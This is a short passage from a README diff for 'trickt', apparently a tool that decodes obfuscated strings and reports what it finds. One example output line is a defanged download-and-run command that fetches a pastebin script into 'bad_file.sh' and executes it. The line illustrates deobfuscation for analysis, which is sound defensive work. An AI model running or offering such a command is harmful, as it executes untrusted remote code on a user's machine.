krayzpipes/trickt/README.md

 [b'curl hxxps://pastebin.com/raw/escaped_hex_nested > bad_file.sh && ./bad_file.sh']
 ```

 Use `trickt.all()` to return a dictionary of all results `trickt` found to be interesting on a single string.
+This
+includes recursive/child results.

 ```python
 >> import json